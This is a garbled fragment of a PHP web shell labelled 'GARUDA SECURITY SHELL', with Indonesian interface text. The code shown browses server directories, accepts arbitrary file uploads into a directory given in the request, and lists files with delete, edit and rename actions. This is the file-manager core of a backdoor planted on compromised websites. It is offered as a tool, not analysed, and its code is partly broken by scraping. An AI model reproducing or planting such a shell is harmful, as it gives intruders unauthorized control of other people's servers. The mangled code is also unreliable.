Home
GARUDA SECURITY SHELL
$value) {
if ($value == "" && $key == 0){
echo '/'; continue;
} echo ''.$value.'/';
}
if (isset($_POST['submit'])){
$namafile = $_FILES['upload']['name'];
$tempatfile = $_FILES['upload']['tmp_name'];
$tempat = $_GET['dir'];
$error = $_FILES['upload']['error'];
$ukuranfile = $_FILES['upload']['size'];
move_uploaded_file($tempatfile, $dir.'/'.$namafile);
echo "
";
}
?>
Nama File / Folder | Size | Action | '.$directory.' | -- | NONE | '; } foreach ($scan as $file) { if (!is_file($dir.'/'.$file)) continue; $jumlah = filesize($dir.'/'.$file)/1024; $jumlah = round($jumlah, 3); if ($jumlah >= 1024) { $jumlah = round($jumlah/1024, 2).'MB'; } else { $jumlah = $jumlah .'KB'; } echo '
---|---|---|
'.$file.' | '.$jumlah.' | Hapus Edit Rename |